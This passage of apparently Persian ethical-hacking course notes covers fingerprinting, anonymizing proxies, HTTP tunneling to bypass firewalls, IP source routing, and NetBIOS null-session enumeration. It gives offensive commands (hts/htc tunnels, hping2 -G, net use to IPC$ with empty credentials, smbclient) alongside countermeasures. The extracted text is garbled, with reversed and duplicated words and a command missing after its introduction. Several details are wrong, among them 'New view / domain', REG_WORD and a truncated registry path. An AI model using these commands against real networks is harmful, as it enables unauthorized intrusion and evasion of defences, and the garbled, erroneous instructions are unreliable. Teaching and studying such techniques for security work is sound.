ﭘﺎﺳﺦ ﻣﻲ دﻫﻨﺪ . ﺑﺮا ي ﻣﺜﺎل، ﻳﻚ ﺳﺮور Microsoft Exchange ، ﺗﻨﻬﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ وﻳﻨﺪوز ﻗﺎﺑﻞ ﻧﺼﺐ اﺳﺖ . .

ﺷﻨﺎﺳﺎﻳﻲ اﻛﺘﻴﻮ ﭘﺸﺘﻪ، ﺷﺎﻣﻞ ارﺳﺎل داده ﻫﺎ ﺑﻪ ﺳﻮي ﺳﻴﺴﺘﻤﻲ ﺑﺮاي دﻳﺪن ﻧﺤﻮه ﭘﺎﺳﺦ آن اﺳﺖ . ﺑﺮاي اﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي ﻣﺨﺘﻠﻒ، از ﭘﺸﺘﻪ ﻫﺎي TCP ﻣﺨﺘﻠﻔﻲ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﻧﺤﻮه ﭘﺎﺳﺦ آﻧﻬ ﺎ ﻣﺘﻔﺎوت اﺳﺖ . ﺳﭙﺲ، اﻳﻦ ﭘﺎﺳﺦ ﻫﺎ ﺑﺎ ﭘﺎﻳﮕﺎه داده اي ﻛﻪ از ﭘﺎﺳﺦ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي ﻣﺨﺘﻠﻒ وﺟﻮد دارد، ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﺷﻮد و ﻧﻮع ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻛﺸﻒ ﻣﻲ ﺷﻮد . اﻳﻦ ﻧﻮع ﺷﻨﺎﺳﺎﻳﻲ، ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ، ﺗﻼش ﻫﺎي ﻣﺘﻌﺪدي را ﺑﺮاي ارﺗﺒﺎط ﺑﺎ ﺳﻴﺴﺘﻢ ﻫﺪف ﻣﻲ ﻛﻨﺪ . .

ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ ﭘﺸﺘﻪ، زﻳﺮﻛﺎﻧﻪ ﺗﺮ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ را ﻣﻮرد ﺑﺮرﺳﻲ ﻗﺮار ﻣﻲ دﻫﺪ ﺗﺎ ﻧﻮع ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﻛﺸﻒ ﻛﻨﺪ و ﺑﻪ ﺟﺎي ﺗﻜﻨﻴﻚ ﻫﺎي اﺳﻜﻦ، از ﺗﻜﻨﻴﻚ ﻫﺎي sniffing اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﻣﻌﻤﻮﻻ، ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻴﻮ ﭘﺸﺘﻪ، ﺗﻮﺳﻂ IDS ﻳﺎ ﺳﻴﺴﺘﻢ ﻫﺎي دﻳﮕﺮ اﻣﻨﻴﺘﻲ ﻏﻴﺮ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ اﺳﺖ اﻣﺎ ﺻﺤﺖ آن ﻛﻤﺘﺮ از ﺷ ﻨﺎﺳﺎﻳﻲ اﻛﺘﻴﻮ اﺳﺖ . .

ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ از telnet ، ﺑﺮاي banner grabbing ﻳ ﻚ ﺳﺎﻳﺖ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

telnet www.certifiedhacker 80 head / http/1.0

ﻫﻤﭽﻨﻴﻦ ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار pof ﻣﻲ ﺗﻮاﻧﻴﺪ اﻃﻼﻋﺎت ﺧﻮﺑﻲ در ﻣﻮرد ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ راه دور ﺑﺪاﻧﻴﺪ . ﺑﺮاي اﻳﻨﻜﺎر از دﺳﺘﻮر

ﺑﺮاي اﺳﻜﻦ آﺳﻴﺐ ﭘﺬﻳﺮ ي ﺎﻫ ﻧﻴﺰ ﻣﻲ ﺗﻮاﻧ ﺪﻴ از اﺑﺰارﻫﺎي زﻳ ﺮ اﺳﺘﻔﺎده ﻛ :ﺪﻴﻨ :ﺪﻴﻨ

• Bidiblah • Qualys Web-based Scanner (www.qualys.com/eccouncil ) • SAINT • ISS Security Scanner • Nessus (for Softwares)

49

• GFI LANGuard • SATAN • Retina • Nagios • NIKTO (for Web Servers) • SAFEsuite Internet Scanner • IdentTCPScan

رﺳﻢ دﻳﺎﮔﺮام ﺷﺒﻜﻪ اي از دﺳﺘﮕﺎه ﻫﺎي آﺳﻴﺐ ﭘﺬﻳﺮ

ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰارﻫﺎي زﻳﺮ ﻣﻲ ﺗﻮان دﻳﺎﮔﺮاﻣﻲ از دﺳﺘﮕﺎه ﻫﺎي آﺳﻴﺐ ﭘﺬﻳﺮي ﻛﻪ در ﺷﺒﻜﻪ وﺟﻮد دارﻧﺪ رﺳﻢ ﻛ :ﺪﻴﻨ :ﺪﻴﻨ

• FriendlyPinger • LANsurveyor • Ipsonar • LANState • Insightix Visibility (www.insightix.com ) • IPCheck Server Monitor (www.paessler.com ) • PRTG Traffic Grapher

ﭼﮕﻮﻧﻪ زا ﺳﺮورﻫﺎي ﭘﺮوﻛﺴﻲ در اﻧﺠﺎم ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ؟

آﻣﺎده ﺳﺎزي ﺳﺮورﻫﺎي ﭘﺮوﻛﺴﻲ، آﺧﺮﻳﻦ ﻣﺮﺣﻠﻪ از ﻣﺘﺪﻟﻮژي اﺳﻜﻦ اﺳﺖ . ﻳﻚ ﺳﺮور ﭘﺮوﻛﺴﻲ ( proxy server ) ، ) ﻛﺎﻣﭙﻴﻮﺗﺮي اﺳﺖ ﻛﻪ ﺑﻪ ﻋﻨﻮان ﻣﻴﺎﻧﺠﻲ ﺑﻴﻦ ﻫﻚ و ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﺪف ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ . ﺑﺎ اﺳﺘﻔﺎده از ﺳﺮور ﭘﺮوﻛﺴﻲ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ روي ﺷﺒﻜﻪ، ﻧﺎﺷﻨﺎس ﺑﺎﺷﺪ . ﻫﻜﺮ اﺑﺘﺪا ارﺗﺒﺎﻃﻲ ﺑﺎ ﺳﺮور ﭘﺮوﻛﺴﻲ ﺑﺮﻗﺮار ﻣﻲ ﻛﻨﺪ و ﺳﭙﺲ درﺧﻮاﺳﺖ ارﺗﺒﺎﻃﻲ ﺑﺎ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﺪف از ﻃﺮﻳﻖ ارﺗﺒﺎط ﻣﻮﺟﻮد ﺑﺎ ﭘﺮوﻛﺴﻲ ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻗﺎﺑﻠﻴﺖ ، ﻫﻜﺮ را ﻗﺎدر ﻣﻲ ﺳﺎزد ﺑﻄﻮر ﻧﺎﺷﻨﺎس ﺑﺮ روي وب ﺑﮕﺮدد و ﻳﺎ اﻳﻨﻜﻪ ﺣﻤﻼت ﺧﻮد را ﻣﺨﻔﻲ ﻛﻨﺪ . .

50

اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﺑﻪ ﻛﺎر ﻣﻲ روﻧﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• SocksChain • Proxy Workbench • ProxyManager • Super Proxy Helper • MultiProxy • TOR Proxy Chaining Software • Proxy Finder • ProxyBag • AutomatedProxy Leecher

ﻧﺎﺷﻨﺎس ﻛﻨﻨﺪه ﻫﺎ ﭼﮕﻮﻧﻪ ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ؟

ﻧﺎﺷﻨﺎس ﻛﻨﻨﺪه (ﻫﺎ Anonymizer ) ﺳﺮوﻳﺲ ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻼش ﻣﻲ ﻛﻨﻨﺪ ﮔﺮدش در وب را ﺨﻣ ﻔﻲ ﻛﻨﻨﺪ ﺎﻬﻧآ ﺎﻬﻧآ اﻳﻦ ﻛﺎر را ﺑﺎ اﺳﺘﻔﺎده از وب ﺳﺎﻳﺘﻲ ﻛﻪ ﺑﻪ ﻋﻨﻮان ﭘﺮوﻛﺴﻲ ﺑﻴﻦ ﺳﺮور ﺑﺮاي ﻛﻼﻳﻨﺖ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ، اﻧﺠﺎم ﻣﻲ ﺪﻨدﻫ . ﺪﻨدﻫ ﻧﺎﺷﻨﺎس ﻛﻨﻨﺪه ﻫﺎ، ﺗﻤﺎم اﻃﻼﻋﺎت ﺷﻨﺎﺳﺎﻳﻲ از ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي ﻛﺎرﺑﺮان را در ﻃﻮل اﺳﺘﻔﺎده از اﻳﻨﺘﺮﻧﺖ ﭘﺎك ﻣﻲ ﻨﻛﻨ ﺪ ﺑ ﻨﺎﺑﺮاﻳﻦ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎرﺑﺮ ﺣﻔﻆ ﻣﻲ ﺷﻮد . ﺑﺮاي دﻳﺪن وب ﺳﺎﻳﺖ ﺑﺼﻮرت ﻧﺎﺷﻨﺎس، ﻫﻜﺮ، آدرس وب ﺳﺎﻳﺖ را داﺧﻞ ﻧﺮم اﻓﺰار ﻧﺎﺷﻨﺎس ﻛﻨﻨﺪه ( Anonymizer ) وارد ﻣﻲ ﻛﻨﺪ و اﻳﻦ ﻧﺮم اﻓﺰار، درﺧﻮاﺳﺖ را ﺑﻪ ﺳﺎﻳﺖ اﻧﺘﺨﺎب ﺷﺪه ارﺳﺎل

51

ﻣﻲ ﺪﻛﻨ . ﺗﻤﺎم درﺧﻮاﺳﺖ ﻫﺎ و ﺻﻔﺤﺎت، ﺑﻪ ﺳﺎﻳﺖ ﻧﺎﺷﻨﺎس ﻛﻨﻨﺪه ﭘﺎﺳﺦ داده ﻣﻲ ﺷﻮﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ردﻳﺎﺑﻲ درﺧﻮاﺳﺖ ﻛﻨﺪه واﻗﻌﻲ ﺻﻔﺤﻪ وب ﺑﺴﻴﺎر ﻣﺸﻜﻞ ﻣﻲ ﺷﻮد . .

از اﺑﺰارﻫﺎي زﻳﺮ ﺑﺮاي ﻧﺎﺷﻨﺎس ﺑﻮدن اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

• StealthSurfer • Browzar • Torpak Browser • GetAnonymous • IP Privacy • Anonymity 4 Proxy • Psiphon • AnalogX Proxy • NetProxy • Proxy+ • ProxySwitcher Lite • JAP • Proxomitron

ﺗﻜﻨﻴﻚ ﻫﺎي HTTP Tunneling

ﻳﻚ روش راﻳﺞ ﺑﺮاي دور زدن ﻓﺎﻳﺮوال ﻳﺎ IDS ﻫﺎ ، اﺳﺘﻔﺎده از ﺗﻮ ﻧﻞ ﺑﺮاي ﭘﺮوﺗﻜﻞ ﺑﻼك ﺷﺪه ( ﻫﻤﭽﻮن SMTP ) از ﻃﺮﻳﻖ ﻳﻚ ﭘﺮوﺗﻜﻞ داراي ﻣﺠﻮز ( ﻫﻤﭽﻮن HTTP ) اﺳﺖ . ﺗﻘﺮﻳﺒﺎ ﻫﻤﻪ IDS ﻫﺎ و ﻓﺎﻳﺮوال ﻫﺎ ﺑﻪ ﻋﻨﻮان ﻳﻚ ﭘﺮوﻛﺴﻲ ﺑﻴﻦ ﻳﻚ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻛﻼﻳ ﻨﺖ و اﻳﻨﺘﺮﻧﺖ ﻋﻤﻞ ﻣﻲ ﻛﻨﻨﺪ و ﺗﻨﻬﺎ ﺗﺮاﻓﻴﻚ ﻣﺠﺎز را ﻋﺒﻮر ﻣﻲ دﻫﻨﺪ . .

اﻏﻠﺐ ﺷﺮﻛﺖ ﻫﺎ، اﺟﺎزه ﻋﺒﻮر ﺗﺮاﻓﻴﻚ HTTP را ﻣﻲ دﻫﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﻳﻚ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از اﺑﺰار HTTP tunneling ، و ﺑﺎ ﻣﺨﻔﻲ ﻛﺮدن ﭘﺮوﺗﻜﻞ ﻫﺎﻳﻲ ﻛﻪ ﺗﻮاﻧﺎﻳﻲ ﺗﺨﺮﻳﺐ دارﻧﺪ ( از ﻗﺒﻴﻞ IM ﻳﺎ ﭼﺖ ) داﺧﻞ ﻳﻚ ﺑﺴﺘﻪ ﭘﺮو ﺗﻜﻞ دﻳﮕﺮ، ﭘﺮوﻛﺴﻲ را از ﻛﺎر ﺑﻴﺎﻧﺪازد . .

اﺑﺰار Httptunnel ﺑﺮاي وﻳﻨﺪوز

ارﺗﺒﺎط ﻣﺠﺎزي دو ﻃﺮﻓﻪ در ﻗﺎﻟﺐ درﺧﻮاﺳﺖ ﻫﺎي HTTP اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ و ﻣﻲ ﺗﻮاﻧﺪ ﺑﺼﻮرت telnet ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي در ﺑﻴﺮون از ﻓﺎﻳﺮوال ﻣﺘﺼﻞ ﺷﺪ . ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺮ روي ﺳﺮور، hts را اﺟﺮا ﻛﻨﻴﺪ اﮔﺮ ﻣﻲ ﺧﻮاﻫﻴﺪ ﻛﻪ ﭘﻮرت ،80 ﺗﻤﺎم ﺗﺮاﻓﻴﻚ ﻫﺎي روي ﭘﻮرت 23 را ﻫﺪاﻳﺖ ﻛﻨﻴﺪ ، از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

Hts –F server.text.com:23 80

52

و ﺑﺮ روي ﻛﻼﻳﻨﺖ ﻧﻴﺰ htc را اﺟﺮا ﻛﻨﻴﺪ . اﮔﺮ ﻣﻲ ﺧﻮاﻫﻴﺪ از ﻃﺮﻳﻖ ﻳﻚ ﭘﺮوﻛﺴﻲ ﻋﺒﻮر ﻛﻨﻴﺪ از ﺳﻮﺋﻴﭻ P– اﺳﺘﻔﺎده ﻛﻨﻴﺪ وﮔﺮﻧﻪ از آن ﺻﺮف ﻧﻈﺮ ﻛﻨﻴﺪ . .

htc -P proxy.corp.com:80 -F 22 server.test.com:80

ﺳﭙﺲ ﺑﻪ telnet ، localhost ﻛﻨﻴﺪ ﻛﻪ ﺗﺮاﻓﻴﻚ ﺧﺎرج از ﭘﻮرت 80 روي ﭘﺮوﻛﺴﻲ ﺳﺮور و روي ﭘﻮرت 80 ﺳﺮور را ﺑﻪ ﭘﻮرت 23 ﻫﺪاﻳﺖ ﺧﻮاﻫﺪ ﻛﺮد . .

ﺗﻜﻨﻴﻚ ﻫﺎي IP Spoofing

ﺑﺮاي ﻛﺎﻫﺶ اﺣﺘﻤﺎل ﺷﻨﺎﺳﺎﻳﻲ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ در زﻣﺎن اﺳﻜﻦ ﺳﻴﺴﺘﻢ ﻫﺎي ﻫﺪف، ﻳﻚ آدرس IP را ﺟ ﻌﻞ ﻛﻨﺪ . ﻳﻜﻲ از ﻣﻌﺎﻳﺐ ﺟﻌﻞ آدرس IP Spoofing ) IP ) اﻳﻦ اﺳﺖ ﻛﻪ ﻧﺸﺴﺖ TCP ﻧﻤﻲ ﺗﻮاﻧﺪ ﺑﻄﻮر ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰ ﻛﺎﻣﻞ ﺷﻮد . .

53

ﻣﺴﻴﺮﻳﺎﺑﻲ ﻣﺒﺪا ( source routing) ، ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﻣﺴﻴﺮي ﻛﻪ ﻳﻚ ﺑﺴﺘﻪ از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻧﺖ ﺣﺮﻛﺖ ﻣﻲ ﻛﻨﺪ را ﻣﺸﺨﺺ ﻛﻨﺪ . اﻳﻦ ﻛﺎر ﺑﺎﻋﺚ ﻣﻲ ﺷﻮد ﺑﺎ دور زدن IDS و ﻓﺎﻳ ﺮوال ﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﺣﻤﻠﻪ را ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ، اﺣﺘﻤﺎل ﺷﻨﺎﺳﺎ ﻳﻲ ﻛﺎﻫﺶ ﻳﺎﺑﺪ . در اﻳﻦ ﺗﻜﻨﻴﻚ، ﻫﻜﺮ ﺑﺎﻳﺪ ﺧﻮد را داﺧﻞ ﻣﺴﻴﺮي ﻛﻪ ﺗﺮاﻓﻴﻚ ﺑﺼﻮرت ﻃﺒﻴﻌﻲ از ﻣﻘﺼﺪ ﺑﻪ ﻣﻨﺒﻊ ﺑﺮﻣﻲ ﮔﺮدد، ﺗﺰرﻳﻖ ﻛﻨﺪ . .

ﺑﺮاي ﺗﺸﺨﻴﺺ IP address spoofing ، ﻣﻲ ﺗﻮاﻧﻴﺪ ﻣﻘﺪارﻫﺎي TTL را ﻣﻘﺎﻳﺴﻪ ﻛﻨﻴﺪ : TTL ﻫﻜﺮ ﺑﺎ TTL واﻗﻌﻲ آدرس ﺟﻌﻞ ﺷﺪه ﻣﺘﻔﺎوت اﺳﺖ . .

دﺳﺘﻮراﺗﻲ ﻛﻪ ﺑﺮاي ﻣﺴﻴﺮﻳﺎﺑﻲ ﻣﺒﺪا اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ ﻋﺒﺎرﺗﻨﺪ از : : tracert -j 10.0.0.50 10.0.0.5

hping2 -G 10.0.0.50 10.0.0.5

ﺑﺮاي ﭘﻴﺸﮕﻴﺮي از آن، ﺑﺎﻳﺴﺘﻲ IP Source Routing را در روﺗﺮ ﻏﻴﺮ ﻓﻌﺎل ﻛﺮد . .

Enumeration

ﭘﺲ از اﺳﻜﻦ، enumeration اﺗﻔﺎق ﻣﻲ اﻓﺘﺪ ﻛﻪ ﻓﺮآﻳﻨﺪ ﺟﻤﻊ آوري و ﻛﺎﻣﭙﺎﻳﻞ ﻛﺮدن ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي، ﻧﺎم ﻣﺎﺷﻴﻦ ﻫﺎ، ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪ، و ﺳﺮوﻳﺲ ﻫﺎ اﺳﺖ . ﻫﻤﭽﻨﻴﻦ ﻛﻮﺋﺮي اﻛﺘﻴﻮ ﺑﺮاي اﺗﺼﺎل ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻫﺪف ﺑﺮاي ﻛﺴﺐ اﻳﻦ اﻃﻼﻋﺎت اﺳﺖ . .

ﻫﺪف enumeration اﻳﻦ اﺳﺖ ﻛﻪ ﺣﺴﺎب ﻛﺎرﺑﺮي ﻳﺎ ﺣﺴﺎب ﺳﻴﺴﺘﻤﻲ را ﺑﺮاي ﻫﻚ ﺳﻴﺴﺘﻢ ﻫﺪف ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ . ﺿﺮورﺗﻲ ﻧﺪارد ﻛﻪ ﺣﺴﺎب ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ را ﭘﻴﺪا ﻛﻨﻴﺪ ﺑﺮاي اﻳﻨﻜﻪ اﻏﻠﺐ ﺳﻄﺢ دﺳﺘﺮﺳﻲ ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ اﻓﺰاﻳﺶ ﻳﺎﺑﻨﺪ . . ﺑﺴﻴﺎري از اﺑﺰارﻫﺎي ﻫﻚ، ﺑﺮاي اﺳﻜﻦ IP ﺷﺒﻜﻪ ﻫﺎ ﻃﺮاﺣﻲ ﺷﺪه اﻧﺪ . ﺑﺮاي ﻫﺮ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ، اﻳﻦ اﺑﺰارﻫﺎ، آدرس IP ، ﻧﺎم ﻛﺎﻣﭙﻴﻮﺗ ﺮ، ﻧﺎم ﻛﺎرﺑﺮي ﻛﺎرﺑﺮ ﺳﻴﺴﺘﻢ، و اﻃﻼﻋﺎت MAC address را اراﺋﻪ ﻣﻲ دﻫﻨﺪ . .

54

در داﻣﻴﻦ وﻳﻨﺪوز 2000 ، اﺑﺰار new view ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻧﺎم NetBIOS اﺳﺘﻔﺎده ﺷﻮد . ﺑﺮاي اﻳﻨﻜﺎر از دﺳﺘﻮر net view اﺳﺘﻔﺎده ﻛﻨﻴﺪ و ﻋﺒﺎرت زﻳﺮ را ﺗﺎﻳﭗ ﻛﻨﻴﺪ : :

New view / domain

Nbtstat –A IP address

ﺑﺎ اﻳﻨﻜﺎر، ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي ﻋﻀﻮ داﻣﻴﻦ و share ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي ﺷﺒﻜﻪ، ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪه اﺳﺖ . .

Null Session

Null session زﻣﺎﻧﻲ اﺗﻔﺎق ﻣﻲ اﻓﺘﺪ ﻛﻪ ﺑﺪون ﻧﺎم ﻛﺎرﺑﺮي و ﭘﺴﻮرد وارد ﺳﻴﺴﺘﻢ ﺷﻮﻳﺪ . NetBIOS null sessions ، ﺑﺴﺘﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ، ﺑﻪ ﻋﻨﻮان آﺳﻴﺐ ﭘﺬﻳﺮي در CIFS ﻳﺎ SMB اﺳﺖ . .

وﻳﻨﺪوز، از SMB و ﻟﻴﻨﻮﻛﺲ/ ﻳﻮﻧﻴﻜﺲ از CIFS اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ ﻳﻚ ارﺗﺒﺎط NetBIOS را ﺑﺎ اﺳﺘﻔﺎده از null session ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺮﻗﺮار ﻛﻨﺪ، ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﻫﻤﻪ ﺣﺴﺎب ﻫﺎ، ﮔﺮوه ﻫﺎ، share ﻫﺎ، ﻣﺠﻮزﻫﺎ، ﺳﻴﺎﺳﺖ ﻫﺎ، و ﺳﺮوﻳﺲ ﻫﺎ دﺳﺘﺮﺳﻲ داﺷﺘﻪ ﺑﺎﺷﺪ . اﺳﺘﺎﻧﺪاردﻫﺎي SMB و NetBIOS در وﻳﻨﺪوز، ﺷﺎﻣﻞ API ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ از ﻃﺮﻳﻖ ﭘﻮرت 139 ، اﻃﻼﻋﺎﺗﻲ را درﺑﺎره ﺳﻴﺴﺘﻢ ﻣ ﻲ .ﺪﻫد .ﺪﻫد ﻲ

ﻳﻚ روش ﺑﺮاي اﺗﺼﺎل ﻳﻚ NetBIOS null session ﺑﻪ ﺳﻴﺴﺘﻢ وﻳﻨﺪوز، اﺳﺘﻔﺎده از $IPC اﺳﺖ . از ﻃﺮﻳﻖ دﺳﺘﻮر net use ﻗﺎﺑﻞ دﺳﺘﺮﺳﻲ اﺳﺖ . دﺳﺘﻮر net use ﻛﻪ ﺑﻪ ﻋﻨﻮان دﺳﺘﻮرات وﻳﻨﺪوز اﺳﺖ ﺑﺮاي اﺗﺼﺎل ﺑﻪ share ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮ دﻳﮕﺮ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻋﻼﻣﺖ ( "" ) ﻧﺸﺎن دﻫﻨﺪه اﻳﻦ اﺳﺖ ﻛﻪ ﺷﻤﺎ ﻣﻲ ﺧﻮاﻫﻴﺪ ﺑﺪون اﺳﺘﻔﺎده از ﻧﺎم ﻛﺎرﺑﺮي و ﭘﺴﻮرد وﺻﻞ ﺷﻮﻳﺪ . ﺑﺮاي اﻳﺠﺎد NetBIOS null session ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺎ آدرس 192,21,7,1 ﺑﺎ ﺣﺴﺎب ﻛﺎرﺑﺮي ﻧﺎﺷﻨﺎس ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮر net use از ﻋﺒﺎرت زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

55

Windows: C:\> net use \\192.21.7.1\IPC$ “” /u: “”

Linux: $ smbclient \\\\target\\ipc\$ “” –U “”

زﻣﺎﻧﻴﻜﻪ دﺳﺘﻮر net use ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺑﻪ ﭘﺎﻳﺎن رﺳﻴﺪ، ﻫﻜﺮ ﻛﺎﻧﺎﻟﻲ دارد ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي اﺑﺰارﻫﺎ و ﺗﻜﻨﻴﻚ ﻫﺎي دﻳﮕﺮ از آن اﺳﺘﻔﺎده ﻛﻨﺪ . .

اﺑﺰارﻫﺎﻳﻲ ﻛﻪ ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ ﻋﺒﺎرﺗﻨﺪ از : :

GetAcct ، user2sid ، sid2user ، enum ، SuperScan ، Nbtstat ، NetView ، DumpSec . .

ﻣﻘﺎﺑﻠﻪ ﺑﺎ Null Session

Null sessions ، از ﭘﻮرت ﻫﺎي 135 ، 137 ، 139 و TCP 445 اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﭘﺲ ﻳﻜﻲ از روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﺎ آن، ﺑﺴﺘﻦ اﻳﻦ ﭘﻮرت ﻫﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺖ . ﻫﻤﭽﻨﻴﻦ ﻣﻲ ﺗﻮان ﺑﺎ ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن ﺳﺮوﻳﺲ SMB روي دﺳﺘﮕﺎه (ﻫﺎ ﻏﻴﺮ ﻓﻌﺎل ﻛﺮدن TCP/IP WINS client) ، از وﻗﻮع آن ﺟﻠﻮﮔﻴﺮي ﻛﺮد . ﺑﺮاي اﻳﻨﻜﺎر، ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

.1 ﺑﺮ روي ﻛﺎر ت ﺷﺒﻜﻪ راﺳﺖ ﻛﻠﻴﻚ ﻛﻨﻴﺪ و ﮔﺰﻳﻨﻪ properties را اﻧﺘﺨﺎب ﻛﻨﻴﺪ. .2 ﺑﺮ روي TCP/IP ﻛﻠﻴﻚ ﻛﻨﻴﺪ و ﺳﭙﺲ دﻛﻤﻪ Properties را ﻛﻠﻴﻚ ﻛﻨﻴﺪ. .3 ﺑﺮ روي دﻛﻤﻪ Advanced ﻛﻠﻴﻚ ﻛﻨﻴﺪ. .4 در زﺑﺎﻧﻪ WINS ، ﮔﺰﻳﻨﻪ disable NetBIOS Over TCP/IP را اﻧﺘﺨﺎب ﻛﻨﻴﺪ.

ﻣﺪﻳﺮ اﻣﻨﻴﺘﻲ ﻣﻲ ﺗﻮاﻧﺪ ﺑﻄﻮر ﻣﺴﺘﻘﻴﻢ رﺟﻴﺴﺘﺮي ر ا وﻳﺮاﻳﺶ ﻛﻨﺪ ﺗﺎ اﺟﺎزه ورود ﻪﺑ ﻛﺎرﺑﺮ ﻧﺎﺷﻨﺎس را ﻧﺪﻫﺪ . ﺑﺮاي ﭘﻴﺎده ﺳﺎزي آن، ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

.Regedt32 1 را ﺑﺎز ﻛﻨﻴﺪ و وارد ﻣﺴﻴﺮ HKLM\SYSTEM\CurrentControlSet\LSA ﺷﻮﻳﺪ. .2 از ﻣﻨﻮي Edit ، ﮔﺰﻳﻨﻪ Add Value را اﻧﺘﺨﺎب ﻛﻨﻴﺪ و ﻣﻘﺎدﻳﺮ زﻳﺮ را وارد ﻛﻨﻴﺪ: Value name: RestrictAnonymous .a Data Type: REG_WORD .b Value: 2 .c

56

ﻫﻤﭽﻨﻴﻦ، PS Tools ﺷﺎﻣﻞ اﺑﺰارﻫﺎﻳﻲ ﺑﺮاي enumeration اﺳﺖ . ﺑﺮﺧﻲ از اﻳﻦ اﺑﺰارﻫﺎ ﻧﻴﺎز ﺑﻪ اﺣﺮاز ﻫﻮﻳﺖ دارﻧﺪ . .

PsExec : اﺟﺮاي از راه دور ﭘﺮدازش ﻫﺎ ﻫﺎ

PsFile : ﻧﻤﺎﻳﺶ از راه دور ﻓﺎﻳﻞ ﻫﺎي ﺑﺎز ﺷﺪه

